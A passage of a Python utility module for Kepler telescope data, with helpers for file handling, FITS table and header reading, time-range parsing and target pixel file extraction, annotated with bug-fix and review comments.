    """Remove *file* from disk.

    Returns 0 on success; on failure logs through kepmsg and returns its
    status value.
    """
    status = 0
    try:
        os.remove(file)
    except:
        status = kepmsg.err(logfile,
                            'ERROR -- KEPIO.DELETE: could not delete ' + file,
                            verbose)
    return status
# -----------------------------------------------------------
# clobber a file
def clobber(file,logfile,verbose):
    """Delete *file* if it exists (silently a no-op otherwise).

    Returns 0 on success or when nothing needed deleting; otherwise the
    kepmsg error status.
    """
    status = 0
    if os.path.isfile(file):
        try:
            status = delete(file,logfile,verbose)
        except:
            status = kepmsg.err(logfile,
                                'ERROR -- KEPIO.CLOBBER: could not clobber ' + file,
                                verbose)
    return status
# -----------------------------------------------------------
# open ASCII file
def openascii(file,type,logfile,verbose):
    """Open the ASCII file *file* in mode *type*.

    Returns (handle, status): handle is the open file object or None on
    failure, status is 0 on success or the kepmsg error status.
    """
    status = 0
    # BUGFIX: initialize so the failure path cannot raise NameError at the
    # return statement (the original left *content* unbound on exception).
    content = None
    try:
        content = open(file,type)
    except:
        message = 'ERROR -- KEPIO.OPENASCII: cannot open ASCII file ' + file
        status = kepmsg.err(logfile,message,verbose)
    return content, status
# -----------------------------------------------------------
# close ASCII file
def closeascii(file,logfile,verbose):
    """Close an open file handle; returns 0 or the kepmsg error status."""
    try:
        file.close()
        return 0
    except:
        return kepmsg.err(logfile,
                          'ERROR - KEPIO.CLOSEASCII: cannot close ASCII file ' + str(file),
                          verbose)
# -----------------------------------------------------------
# split FITS filename and HDU number
def splitfits(file,logfile,verbose):
    """Split a FITS file specification into (filename, HDU number, status).

    Accepts either 'name.fits+N' or 'name.fits[N]'.  On an unparsable
    specification the whole string is returned as the filename with HDU 0
    and a non-zero status.

    Bug fix: in the error branch the original never assigned ``filename``
    or ``hdu``, so the return raised UnboundLocalError instead of
    reporting the status.
    """
    status = 0
    file = file.strip()
    filename = file
    hdu = 0
    if '+' in file:
        component = file.split('+')
        filename = str(component[0])
        hdu = int(component[1])
    elif '[' in file:
        file = file.strip(']')
        component = file.split('[')
        filename = str(component[0])
        hdu = int(component[1])
    else:
        message = 'ERROR -- KEPIO.SPLITFITS: cannot determine HDU number from name' + file
        status = kepmsg.err(logfile,message,verbose)
    return filename, hdu, status
# -----------------------------------------------------------
# open HDU structure
def openfits(file,mode,logfile,verbose):
    """Open *file* as a FITS HDU list in the given *mode*.

    Returns (HDUList or None, status).
    """
    try:
        struct = pyfits.open(file,mode=mode)
    except:
        message = 'ERROR -- KEPIO.OPENFITS: cannot open ' + file + ' as a FITS file'
        return None, kepmsg.err(logfile,message,verbose)
    return struct, 0
# -----------------------------------------------------------
# close HDU structure
def closefits(struct,logfile,verbose):
    """Close an open HDU structure; return 0 on success."""
    try:
        struct.close()
    except:
        txt = 'ERROR -- KEPIO.CLOSEFITS: cannot close HDU structure'
        return kepmsg.err(logfile,txt,verbose)
    return 0
# -----------------------------------------------------------
# read FITS table HDU
def readfitstab(file,hdu,logfile,verbose):
    """Return (table data, status) from a FITS table HDU.

    Warnings raised while touching ``hdu.data`` are suppressed.
    """
    table, status = None, 0
    try:
        with warnings.catch_warnings():
            warnings.simplefilter('ignore')
            table = hdu.data
    except:
        message = 'ERROR -- KEPIO.READFITSTAB: could not extract table from ' + file
        status = kepmsg.err(logfile,message,verbose)
    return table, status
# -----------------------------------------------------------
# read FITS table column
def readfitscol(file,table,column,logfile,verbose):
    """Return (column data, status) for *column* of a FITS table."""
    try:
        return table.field(column), 0
    except:
        message = ('ERROR -- KEPIO.READFITSCOL: could not extract ' + column
                   + ' data from ' + file)
        return None, kepmsg.err(logfile,message,verbose)
# -----------------------------------------------------------
# read TIME column
def readtimecol(file,table,logfile,verbose):
    """Read the time column, preferring 'TIME' then legacy 'barytime'.

    Legacy barytime values stored as reduced Julian dates are shifted by
    2.4e6 days.  Returns (data, status).
    """
    status = 0
    try:
        data = table.field('TIME')
    except:
        try:
            data = table.field('barytime')
            # legacy files store barytime as BJD - 2400000; restore full BJD
            if data[0] < 2.4e6 and data[0] > 1.0e4:
                data += 2.4e6
        except:
            message = ('ERROR -- KEPIO.READTIMECOL: could not extract'
                       ' time data from ' + file)
            status = kepmsg.err(logfile,message,verbose)
            data = None
    return data, status
# -----------------------------------------------------------
# read FITS SAP column
def readsapcol(file,table,logfile,verbose):
    """Read the SAP flux column ('SAP_FLUX', legacy 'ap_raw_flux').

    Returns (data, status).
    """
    status = 0
    data = None
    found = False
    for name in ('SAP_FLUX', 'ap_raw_flux'):
        try:
            data = table.field(name)
            found = True
            break
        except:
            continue
    if not found:
        message = ('ERROR -- KEPIO.READSAPCOL: could not extract SAP flux'
                   ' time series data from ' + file)
        status = kepmsg.err(logfile,message,verbose)
    return data, status
# -----------------------------------------------------------
# read FITS SAP error column
def readsaperrcol(file,table,logfile,verbose):
    """Read the SAP flux error column ('SAP_FLUX_ERR', legacy 'ap_raw_err').

    Returns (data, status).
    """
    status = 0
    data = None
    found = False
    for name in ('SAP_FLUX_ERR', 'ap_raw_err'):
        try:
            data = table.field(name)
            found = True
            break
        except:
            continue
    if not found:
        message = ('ERROR -- KEPIO.READSAPERRCOL: could not extract SAP flux error'
                   ' time series data from ' + file)
        status = kepmsg.err(logfile,message,verbose)
    return data, status
# -----------------------------------------------------------
# read FITS PDC column
def readpdccol(file,table,logfile,verbose):
    """Read the PDC flux column ('PDCSAP_FLUX', legacy 'ap_corr_flux').

    Returns (data, status).
    """
    status = 0
    data = None
    found = False
    for name in ('PDCSAP_FLUX', 'ap_corr_flux'):
        try:
            data = table.field(name)
            found = True
            break
        except:
            continue
    if not found:
        message = ('ERROR -- KEPIO.READPDCCOL: could not extract PDCSAP flux'
                   ' time series data from ' + file)
        status = kepmsg.err(logfile,message,verbose)
    return data, status
# -----------------------------------------------------------
# read FITS PDC error column
def readpdcerrcol(file,table,logfile,verbose):
    """Read the PDC flux error column ('PDCSAP_FLUX_ERR', legacy 'ap_corr_err').

    Returns (data, status).
    """
    status = 0
    data = None
    found = False
    for name in ('PDCSAP_FLUX_ERR', 'ap_corr_err'):
        try:
            data = table.field(name)
            found = True
            break
        except:
            continue
    if not found:
        message = ('ERROR -- KEPIO.READPDCERRCOL: could not extract PDC flux error'
                   ' time series data from ' + file)
        status = kepmsg.err(logfile,message,verbose)
    return data, status
# -----------------------------------------------------------
# read FITS CBV column
def readcbvcol(file,table,logfile,verbose):
    """Read the cotrended flux column 'CBVSAP_FLUX'; return (data, status)."""
    try:
        return table.field('CBVSAP_FLUX'), 0
    except:
        message = ('ERROR -- KEPIO.READCBVCOL: could not extract CBVSAP flux'
                   ' time series data from ' + file)
        return None, kepmsg.err(logfile,message,verbose)
# -----------------------------------------------------------
# read quality column
def readsapqualcol(file,table,logfile,verbose):
    """Read the 'SAP_QUALITY' flag column; return (data, status).

    Bug fix: the error branch executed ``data, status = None``, which
    raises TypeError (cannot unpack None) instead of returning
    (None, status).
    """
    status = 0
    try:
        data = table.field('SAP_QUALITY')
    except:
        message = 'ERROR -- KEPIO.READSAPQUALCOL: could not extract SAP quality'
        message += ' time series data from ' + file
        status = kepmsg.err(logfile,message,verbose)
        data = None
    return data, status
# -----------------------------------------------------------
# read all columns within Kepler FITS light curve table
def readlctable(infile,instr,logfile,verbose):
    """Read every column of a legacy Kepler light-curve table HDU.

    Returns (list of 19 column arrays in fixed order, status).  As in the
    original implementation, status reflects the outcome of the *last*
    column read.
    """
    status = 0
    table = instr.data
    columns = []
    for name in ('barytime', 'timcorr', 'cadence_number', 'ap_cent_row',
                 'ap_cent_r_err', 'ap_cent_col', 'ap_cent_c_err',
                 'ap_raw_flux', 'ap_raw_err', 'ap_corr_flux', 'ap_corr_err',
                 'ap_ins_flux', 'ap_ins_err', 'dia_raw_flux', 'dia_raw_err',
                 'dia_corr_flux', 'dia_corr_err', 'dia_ins_flux',
                 'dia_ins_err'):
        data, status = readfitscol(infile,table,name,logfile,verbose)
        columns.append(data)
    return columns, status
# -----------------------------------------------------------
# append two table HDUs
def tabappend(hdu1,hdu2,logfile,verbose):
    """Concatenate the rows of two table HDUs.

    Builds a new table using hdu1's column layout sized for both row sets,
    then copies hdu2's rows in after hdu1's.  A column unreadable from
    hdu2 produces a warning rather than a failure.
    Returns (new HDU, status).
    """
    status = 0
    nrows1 = hdu1.data.shape[0]
    nrows2 = hdu2.data.shape[0]
    out = pyfits.new_table(hdu1.columns,nrows=nrows1 + nrows2)
    for name in hdu1.columns.names:
        try:
            out.data.field(name)[nrows1:] = hdu2.data.field(name)
        except:
            message = 'WARNING -- KEPIO.TABAPPEND: could not append column '
            message += str(name)
            status = kepmsg.warn(logfile,message,verbose)
    return out, status
# -----------------------------------------------------------
# read image from HDU structure
def readimage(struct,hdu,logfile,verbose):
    """Return (image array, status) from extension *hdu* of an HDU list.

    Bug fix: the original left ``imagedata`` unbound on failure and raised
    UnboundLocalError at the return; None is now returned instead.
    """
    status = 0
    imagedata = None
    try:
        imagedata = struct[hdu].data
    except:
        message = 'ERROR -- KEPIO.READIMAGE: cannot read image data from HDU ' + str(hdu)
        status = kepmsg.err(logfile,message,verbose)
    return imagedata, status
# -----------------------------------------------------------
# write image to HDU structure
def writeimage(struct,hdu,imagedata,logfile,verbose):
    """Store *imagedata* into extension *hdu*; return (struct, status)."""
    try:
        struct[hdu].data = imagedata
    except:
        message = 'ERROR -- KEPIO.WRITEIMAGE: Cannot write image data to HDU ' + str(hdu)
        return struct, kepmsg.err(logfile,message,verbose)
    return struct, 0
# -----------------------------------------------------------
# write new FITS file
def writefits(hdu,filename,clobber,logfile,verbose):
    """Write *hdu* to *filename*, optionally deleting an existing file first.

    Returns 0 on success or the kepmsg error status.
    """
    if clobber and os.path.isfile(filename):
        delete(filename,logfile,verbose)
    try:
        hdu.writeto(filename)
    except:
        message = 'ERROR -- KEPIO.WRITEFITS: Cannot create FITS file ' + filename
        return kepmsg.err(logfile,message,verbose)
    return 0
# -----------------------------------------------------------
# create a temporary file name
def tmpfile(path,suffix,logfile,verbose):
    """Generate a temporary file name under *path* ending with *suffix*.

    Returns (name, status).

    Bug fix: the original left ``file`` unbound on failure, raising
    UnboundLocalError at the return.  NOTE(review): tempfile.mktemp is
    race-prone -- another process may claim the name before it is used.
    """
    status = 0
    file = None
    try:
        tempfile.tempdir = path
        file = tempfile.mktemp() + suffix
    except:
        message = 'ERROR -- KEPIO.TMPFILE: Cannot create temporary file name'
        status = kepmsg.err(logfile,message,verbose)
    return file, status
# -----------------------------------------------------------
# create symbolic link
def symlink(infile,linkfile,clobber,logfile,verbose):
    """Create a symbolic link *linkfile* pointing at *infile*.

    Refuses to overwrite an existing file unless *clobber* is set.
    Returns 0 on success or the kepmsg error status.
    """
    if os.path.exists(linkfile) and not clobber:
        txt = 'ERROR: KEPIO.SYMLINK -- file ' + linkfile + ' exists, use clobber'
        return kepmsg.err(logfile,txt,verbose)
    if clobber:
        # best-effort removal; a missing link file is not an error
        try:
            os.remove(linkfile)
        except:
            pass
    try:
        os.symlink(infile,linkfile)
    except:
        txt = ('ERROR: KEPIO.SYMLINK -- could not create symbolic link from '
               + infile + ' to ' + linkfile)
        return kepmsg.err(logfile,txt,verbose)
    return 0
# -----------------------------------------------------------
# check that a file exists
def fileexists(file):
    """Return True when *file* exists and is a regular file."""
    return os.path.isfile(file)
# -----------------------------------------------------------
# move file
def move(file1,file2,logfile,verbose):
    """Move *file1* to *file2*, logging the action; return 0 or error status."""
    try:
        shutil.move(file1,file2)
        kepmsg.log(logfile,'KEPIO.MOVE -- moved ' + file1 + ' to ' + file2,verbose)
    except:
        message = 'ERROR -- KEPIO.MOVE: Could not move ' + file1 + ' to ' + file2
        return kepmsg.err(logfile,message,verbose)
    return 0
# -----------------------------------------------------------
# copy file
def copy(file1,file2,logfile,verbose):
    """Copy *file1* to *file2* (metadata preserved); return 0 or error status."""
    try:
        shutil.copy2(file1,file2)
        kepmsg.log(logfile,'KEPIO.COPY -- copied ' + file1 + ' to ' + file2,verbose)
    except:
        message = 'ERROR -- KEPIO.COPY: could not copy ' + file1 + ' to ' + file2
        return kepmsg.err(logfile,message,verbose)
    return 0
# -----------------------------------------------------------
# create a list from a file, string or wildcard
def parselist(inlist,logfile,verbose):
    """Expand an input specification into a list of file names.

    *inlist* may be '@file' (one name per line), a comma-separated string,
    or a glob wildcard.  Returns (names, status).

    Fixes: the original discarded the result of ``inlist.strip()`` (a
    no-op), indexed ``inlist[0]`` on an empty string (IndexError), never
    closed the '@' list file, and shadowed the ``list`` builtin.
    """
    status = 0
    inlist = inlist.strip()
    if len(inlist) == 0 or inlist.count(' ') > 0:
        message = 'ERROR -- KEPIO.PARSELIST: list not specified'
        status = kepmsg.err(logfile,message,verbose)
    # test that an @filelist exists
    if status == 0 and inlist[0] == '@':
        infile = inlist.lstrip('@')
        if not os.path.isfile(infile):
            message = 'ERROR -- KEPIO.PARSELIST: input list '+infile+' does not exist'
            status = kepmsg.err(logfile,message,verbose)
    # parse @file, wildcard and comma-separated lists
    outlist = []
    if status == 0 and inlist[0] == '@':
        with open(inlist.lstrip('@')) as listfile:
            for line in listfile:
                if len(line.strip()) > 0:
                    outlist.append(line.rstrip('\r\n'))
    elif status == 0 and '*' not in inlist:
        outlist = inlist.split(',')
    elif status == 0:
        outlist = glob.glob(inlist)
    if status == 0 and len(outlist) == 0:
        message = 'ERROR -- KEPIO.PARSELIST: raw input image list is empty'
        status = kepmsg.err(logfile,message,verbose)
    return outlist, status
# -----------------------------------------------------------
# create a directory
def createdir(path,logfile,verbose):
    """Create directory *path* (a trailing '/' is enforced).

    Logs whether the directory was created or already existed; returns 0
    on success or the kepmsg error status.
    """
    status = 0
    path = path.strip()
    if (path[-1] != '/'): path += '/'
    if os.path.exists(path):
        kepmsg.log(logfile,'KEPIO.CREATEDIR -- ' + path + ' directory exists',verbose)
    else:
        try:
            os.mkdir(path)
            kepmsg.log(logfile,'KEPIO.CREATEDIR -- Created directory ' + path,verbose)
        except:
            message = 'ERROR -- KEPIO.CREATEDIR: Could not create '
            message += 'directory ' + path
            status = kepmsg.err(logfile,message,verbose)
    return status
# -----------------------------------------------------------
# create a directory tree
def createtree(path,logfile,verbose):
    """Create directory tree *path* (a trailing '/' is enforced).

    Like createdir but builds intermediate directories with os.makedirs.
    Returns 0 on success or the kepmsg error status.
    """
    status = 0
    path = path.strip()
    if (path[-1] != '/'): path += '/'
    if os.path.exists(path):
        kepmsg.log(logfile,'KEPIO.CREATETREE -- ' + path + ' directory exists',verbose)
    else:
        try:
            os.makedirs(path)
            kepmsg.log(logfile,'KEPIO.CREATETREE -- Created directory tree ' + path,verbose)
        except:
            message = 'ERROR -- KEPIO.CREATETREE: Could not create '
            message += 'directory tree ' + path
            status = kepmsg.err(logfile,message,verbose)
    return status
# -----------------------------------------------------------
# number of HDU within a FITS structure
def HDUnum(struct):
    """Count the extensions of an HDU list by probing headers until one fails."""
    nhdu = 0
    while True:
        try:
            struct[nhdu].header[0]
        except:
            return nhdu
        nhdu += 1
# -----------------------------------------------------------
# read time ranges from ascii file
def timeranges(ranges,logfile,verbose):
    """Parse time ranges from a literal string or an '@file'.

    *ranges* is either '@filename' (one 'start,stop' pair per line) or a
    'start1,stop1;start2,stop2;...' string.  A 0,0 pair means an
    open-ended range (stop forced to 1.0e8).
    Returns (tstart list, tstop list, status).
    """
    status = 0; tstart = []; tstop = []
    if '@' in ranges:
        try:
            lines, status = openascii(ranges[1:],'r',logfile,verbose)
        except:
            txt = 'ERROR -- KEPIO.TIMERANGES: cannot open file ' + ranges[1:]
            status = kepmsg.err(logfile,txt,verbose)
            return tstart, tstop, status
        for line in lines:
            line = line.strip().split(',')
            if len(line) == 2:
                try:
                    # both fields must parse as floats or the line is skipped
                    float(line[0])
                    float(line[1])
                    tstart.append(float(line[0]))
                    tstop.append(float(line[1]))
                    # 0,0 means "no upper bound"
                    if tstart[-1] == 0.0 and tstop[-1] == 0.0: tstop[-1] = 1.0e8
                except:
                    continue
        status = closeascii(lines,logfile,verbose)
        if len(tstart) == 0 or len(tstop) == 0 or len(tstart) != len(tstop) or status > 0:
            txt = 'ERROR -- KEPIO.TIMERANGES: cannot understand content of ' + ranges[1:]
            status = kepmsg.err(logfile,txt,verbose)
            return tstart, tstop, status
    else:
        try:
            # literal form: semicolon-separated 'start,stop' pairs
            ranges = ranges.strip().split(';')
            for i in range(len(ranges)):
                tstart.append(float(ranges[i].strip().split(',')[0]))
                tstop.append(float(ranges[i].strip().split(',')[1]))
                if tstart[-1] == 0.0 and tstop[-1] == 0.0: tstop[-1] = 1.0e8
        except:
            # any malformed pair invalidates the whole specification
            tstart = []; tstop = []
        if len(tstart) == 0 or len(tstop) == 0 or len(tstart) != len(tstop) or status > 0:
            txt = 'ERROR -- KEPIO.TIMERANGES: cannot understand time ranges provided'
            status = kepmsg.err(logfile,txt,verbose)
            return tstart, tstop, status
    return tstart, tstop, status
## -----------------------------------------------------------
## manual calculation of median cadence within a time series
def cadence(instr,infile,logfile,verbose,status):
    """Estimate the median cadence (in seconds) of a time series.

    Reads the 'barytime' column from extension 1, falling back to 'time'.
    Returns (first time, last time, number of samples, cadence sec, status).

    Bug fix: the fallback called ``kepio.readfitscol`` from inside the
    kepio module itself, which raises NameError; it now calls
    readfitscol directly.
    """
    try:
        intime = instr[1].data.field('barytime')
    except:
        intime, status = readfitscol(infile,instr[1].data,'time',logfile,verbose)
    # median of the finite consecutive differences, converted days -> seconds
    dt = []
    for i in range(1,len(intime)):
        if numpy.isfinite(intime[i]) and numpy.isfinite(intime[i-1]):
            dt.append(intime[i] - intime[i-1])
    dt = numpy.array(dt,dtype='float32')
    cadnce = numpy.median(dt) * 86400.0
    return intime[0], intime[-1], len(intime), cadnce, status
# -----------------------------------------------------------
# read time keywords
def timekeys(instr,file,logfile,verbose,status):
    """Extract start/stop times, BJD reference and cadence from FITS headers.

    Walks a chain of historical keyword conventions (TSTART/STARTBJD/
    LC_START and TSTOP/ENDBJD/LC_END) and shifts everything onto the
    BJDREFI+BJDREFF zero point.  Cadence is inferred from OBSMODE or the
    legacy DATATYPE keyword.
    Returns (tstart, tstop, bjdref, cadence seconds, status).
    """
    tstart = 0.0; tstop = 0.0; cadence = 0.0
    # BJDREFI (integer part of the BJD reference; 0.0 when absent)
    try:
        bjdrefi = instr[1].header['BJDREFI']
    except:
        bjdrefi = 0.0
    # BJDREFF (fractional part of the BJD reference; 0.0 when absent)
    try:
        bjdreff = instr[1].header['BJDREFF']
    except:
        bjdreff = 0.0
    bjdref = bjdrefi + bjdreff
    # TSTART -- legacy fallbacks carry their own epoch offsets
    try:
        tstart = instr[1].header['TSTART']
    except:
        try:
            tstart = instr[1].header['STARTBJD']
            tstart += 2.4e6
        except:
            try:
                tstart = instr[0].header['LC_START']
                tstart += 2400000.5
            except:
                try:
                    tstart = instr[1].header['LC_START']
                    tstart += 2400000.5
                except:
                    message = 'ERROR -- KEPIO.TIMEKEYS: Cannot find TSTART, STARTBJD or '
                    message += 'LC_START in ' + file
                    status = kepmsg.err(logfile,message,verbose)
    tstart += bjdref
    # TSTOP -- same fallback chain for the end time
    # NOTE(review): the error text says STOPBJD/LC_STOP but the keywords
    # probed are ENDBJD/LC_END -- message and code disagree; confirm intent.
    try:
        tstop = instr[1].header['TSTOP']
    except:
        try:
            tstop = instr[1].header['ENDBJD']
            tstop += 2.4e6
        except:
            try:
                tstop = instr[0].header['LC_END']
                tstop += 2400000.5
            except:
                try:
                    tstop = instr[1].header['LC_END']
                    tstop += 2400000.5
                except:
                    message = 'ERROR -- KEPIO.TIMEKEYS: Cannot find TSTOP, STOPBJD or '
                    message += 'LC_STOP in ' + file
                    status = kepmsg.err(logfile,message,verbose)
    tstop += bjdref
    # OBSMODE -> cadence in seconds (short/long cadence constants)
    cadence = 1.0
    try:
        obsmode = instr[0].header['OBSMODE']
    except:
        try:
            obsmode = instr[1].header['DATATYPE']
        except:
            message = 'ERROR -- KEPIO.TIMEKEYS: cannot find keyword OBSMODE '
            message += 'or DATATYPE in ' + file
            status = kepmsg.err(logfile,message,verbose)
    if status == 0:
        if 'short' in obsmode: # and bjdref == 0.0:
            cadence = 54.1782
        elif 'long' in obsmode: # and bjdref == 0.0:
            cadence = 1625.35
    return tstart, tstop, bjdref, cadence, status
# -----------------------------------------------------------
# filter input data table
def filterNaN(instr,datacol,outfile,logfile,verbose):
    """Strip cadences with missing time or *datacol* values from extension 1.

    Skipped entirely when the NANCLEAN header keyword is already present.
    Compacts the table in place and records NANCLEAN=True on success.
    Returns (instr, status).

    NOTE(review): ``timecol`` is only assigned when some column name
    contains 'time'; if none does, the filtering loop raises NameError.
    The test compares str(value) against '-inf', so it filters -inf
    sentinels rather than NaN proper -- presumably upstream maps missing
    samples to -inf; confirm.
    """
    status = 0
    try:
        # NANCLEAN present => a previous run already filtered this file
        nanclean = instr[1].header['NANCLEAN']
    except:
        naxis2 = 0
        # locate the time column by name (last match wins)
        for i in range(len(instr[1].columns.names)):
            if 'time' in instr[1].columns.names[i].lower():
                timecol = instr[1].columns.names[i]
        try:
            instr[1].data.field(datacol)
        except:
            msg = 'ERROR -- KEPIO.FILTERNAN: cannot find column ' + datacol + ' in the infile'
            status = kepmsg.err(logfile,msg,verbose)
        if status == 0:
            try:
                # copy good rows to the front of the table, then truncate
                for i in range(len(instr[1].data.field(0))):
                    if str(instr[1].data.field(timecol)[i]) != '-inf' and \
                    str(instr[1].data.field(datacol)[i]) != '-inf':
                        instr[1].data[naxis2] = instr[1].data[i]
                        naxis2 += 1
                instr[1].data = instr[1].data[:naxis2]
                comment = 'NaN cadences removed from data'
                status = kepkey.new('NANCLEAN',True,comment,instr[1],outfile,logfile,verbose)
            except:
                msg = 'ERROR -- KEPIO.FILTERNAN: Failed to filter NaNs from '+ outfile
                status = kepmsg.err(logfile,msg,verbose)
    return instr, status
# -----------------------------------------------------------
# read target pixel data file
def readTPF(infile,colname,logfile,verbose):
    """Read target metadata and the *colname* pixel column from a target pixel file.

    Mandatory keywords (KEPLERID, CHANNEL, MODULE, OUTPUT, QUARTER/CAMPAIGN,
    RA_OBJ, DEC_OBJ, TDIM5, 1CRV5P, 2CRV5P) raise an error status when
    missing; optional ones (SKYGROUP, SEASON, KEPMAG) fall back to defaults.
    3-D pixel arrays (old STSCI_PYTHON output) are flattened to 2-D.
    Returns (kepid, channel, skygroup, module, output, quarter, season,
    ra, dec, column, row, kepmag, xdim, ydim, pixels, status).
    """
    status = 0
    tpf = pyfits.open(infile,mode='readonly',memmap=True)
    if status == 0:
        try:
            naxis2 = tpf['TARGETTABLES'].header['NAXIS2']
        except:
            txt = 'ERROR -- KEPIO.READTPF: No NAXIS2 keyword in ' + infile + '[TARGETTABLES]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        try:
            kepid = tpf[0].header['KEPLERID']
            kepid = str(kepid)
        except:
            txt = 'ERROR -- KEPIO.READTPF: No KEPLERID keyword in ' + infile + '[0]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        try:
            channel = tpf[0].header['CHANNEL']
            channel = str(channel)
        except:
            txt = 'ERROR -- KEPIO.READTPF: No CHANNEL keyword in ' + infile + '[0]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        # optional keyword: default rather than error
        try:
            skygroup = tpf[0].header['SKYGROUP']
            skygroup = str(skygroup)
        except:
            skygroup = '0'
    if status == 0:
        try:
            module = tpf[0].header['MODULE']
            module = str(module)
        except:
            txt = 'ERROR -- KEPIO.READTPF: No MODULE keyword in ' + infile + '[0]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        try:
            output = tpf[0].header['OUTPUT']
            output = str(output)
        except:
            txt = 'ERROR -- KEPIO.READTPF: No OUTPUT keyword in ' + infile + '[0]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        # K2 files carry CAMPAIGN instead of QUARTER
        try:
            quarter = tpf[0].header['QUARTER']
            quarter = str(quarter)
        except:
            try:
                quarter = tpf[0].header['CAMPAIGN']
                quarter = str(quarter)
            except:
                txt = 'ERROR -- KEPIO.READTPF: No QUARTER or CAMPAIGN keyword in ' + infile + '[0]'
                status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        # optional keyword: default rather than error
        try:
            season = tpf[0].header['SEASON']
            season = str(season)
        except:
            season = '0'
    if status == 0:
        try:
            ra = tpf[0].header['RA_OBJ']
            ra = str(ra)
        except:
            txt = 'ERROR -- KEPIO.READTPF: No RA_OBJ keyword in ' + infile + '[0]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        try:
            dec = tpf[0].header['DEC_OBJ']
            dec = str(dec)
        except:
            txt = 'ERROR -- KEPIO.READTPF: No DEC_OBJ keyword in ' + infile + '[0]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        # optional keyword: blank when missing or unparsable
        try:
            kepmag = tpf[0].header['KEPMAG']
            kepmag = str(float(kepmag))
        except:
            kepmag = ''
    if status == 0:
        # TDIM5 holds the pixel stamp dimensions as '(x,y)'
        try:
            tdim5 = tpf['TARGETTABLES'].header['TDIM5']
            xdim = int(tdim5.strip().strip('(').strip(')').split(',')[0])
            ydim = int(tdim5.strip().strip('(').strip(')').split(',')[1])
        except:
            txt = 'ERROR -- KEPIO.READTPF: Cannot read TDIM5 keyword in ' + infile + '[TARGETTABLES]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        # 1CRV5P/2CRV5P give the CCD column/row of the stamp origin
        try:
            crv5p1 = tpf['TARGETTABLES'].header['1CRV5P']
            column = crv5p1
        except:
            txt = 'ERROR -- KEPIO.READTPF: Cannot read 1CRV5P keyword in ' + infile + '[TARGETTABLES]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        try:
            crv5p2 = tpf['TARGETTABLES'].header['2CRV5P']
            row = crv5p2
        except:
            txt = 'ERROR -- KEPIO.READTPF: Cannot read 2CRV5P keyword in ' + infile + '[TARGETTABLES]'
            status = kepmsg.err(logfile,txt,verbose)
# read and close TPF data pixel image
    if status == 0:
        try:
            pixels = tpf['TARGETTABLES'].data.field(colname)[:]
        except:
            pixels = None
            txt = '\nWARNING -- KEPIO.READTPF: Cannot read ' + colname + ' column in ' + infile + '[TARGETTABLES]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        status = closefits(tpf,logfile,verbose)
# for STSCI_PYTHON v2.12 - convert 3D data array to 2D
    if status == 0 and len(numpy.shape(pixels)) == 3:
        isize = numpy.shape(pixels)[0]
        jsize = numpy.shape(pixels)[1]
        ksize = numpy.shape(pixels)[2]
        pixels = numpy.reshape(pixels,(isize,jsize*ksize))
    return kepid, channel, skygroup, module, output, quarter, season, \
        ra, dec, column, row, kepmag, xdim, ydim, pixels, status
# -----------------------------------------------------------
# read target pixel mask data
def readMaskDefinition(infile,logfile,verbose):
    """Read the aperture mask image and per-pixel WCS coordinates of *infile*.

    Returns (mask image, pixelcoord1, pixelcoord2, status).

    Bug fix: the error branches called ``kepwarn.err`` but no ``kepwarn``
    module is imported anywhere in this file, so every error path raised
    NameError; they now report through ``kepmsg.err`` like the rest of
    this module (status stays non-zero as before).
    """
    status = 0
    # open input file
    inf, status = openfits(infile,'readonly',logfile,verbose)
    # read bitmap image
    if status == 0:
        try:
            img = inf['APERTURE'].data
        except:
            txt = 'WARNING -- KEPIO.READMASKDEFINITION: Cannot read mask defintion in ' + infile + '[APERTURE]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        try:
            naxis1 = inf['APERTURE'].header['NAXIS1']
        except:
            txt = 'WARNING -- KEPIO.READMASKDEFINITION: Cannot read NAXIS1 keyword in ' + infile + '[APERTURE]'
            status = kepmsg.err(logfile,txt,verbose)
    if status == 0:
        try:
            naxis2 = inf['APERTURE'].header['NAXIS2']
        except:
            txt = 'WARNING -- KEPIO.READMASKDEFINITION: Cannot read NAXIS2 keyword in ' + infile + '[APERTURE]'
            status = kepmsg.err(logfile,txt,verbose)
    # read WCS keywords
    if status == 0:
        crpix1p, crpix2p, crval1p, crval2p, cdelt1p, cdelt2p, status = \
            kepkey.getWCSp(infile,inf['APERTURE'],logfile,verbose)
    if status == 0:
        # physical (CCD) coordinate of every pixel from the pixel WCS
        pixelcoord1 = numpy.zeros((naxis1,naxis2))
        pixelcoord2 = numpy.zeros((naxis1,naxis2))
        for j in range(naxis2):
            for i in range(naxis1):
                pixelcoord1[i,j] = kepkey.wcs(i,crpix1p,crval1p,cdelt1p)
                pixelcoord2[i,j] = kepkey.wcs(j,crpix2p,crval2p,cdelt2p)
    # close input file
    if status == 0:
        status = closefits(inf,logfile,verbose)
    return img, pixelcoord1, pixelcoord2, status
# -----------------------------------------------------------
# read pixel response file
def readPRFimage(infile,hdu,logfile,verbose):
    """Read a pixel response function image plus its pixel WCS keywords.

    Returns (img, crpix1p, crpix2p, crval1p, crval2p, cdelt1p, cdelt2p,
    status).  NAXIS1/NAXIS2 are probed purely as a sanity check on the
    extension.
    """
    prf, status = openfits(infile,'readonly',logfile,verbose)
    if status == 0:
        try:
            img = prf[hdu].data
        except:
            txt = 'ERROR -- KEPIO.READPRFIMAGE: Cannot read PRF image in ' + infile + '[' + str(hdu) + ']'
            status = kepmsg.err(logfile,txt,verbose)
    for axis in ('NAXIS1', 'NAXIS2'):
        if status == 0:
            try:
                prf[hdu].header[axis]
            except:
                txt = 'ERROR -- KEPIO.READPRFIMAGE: Cannot read ' + axis + ' keyword in ' + infile + '[' + str(hdu) + ']'
                status = kepmsg.err(logfile,txt,verbose)
    # read WCS keywords
    if status == 0:
        crpix1p, crpix2p, crval1p, crval2p, cdelt1p, cdelt2p, status = \
            kepkey.getWCSp(infile,prf[hdu],logfile,verbose)
    # close input file
    if status == 0:
        status = closefits(prf,logfile,verbose)
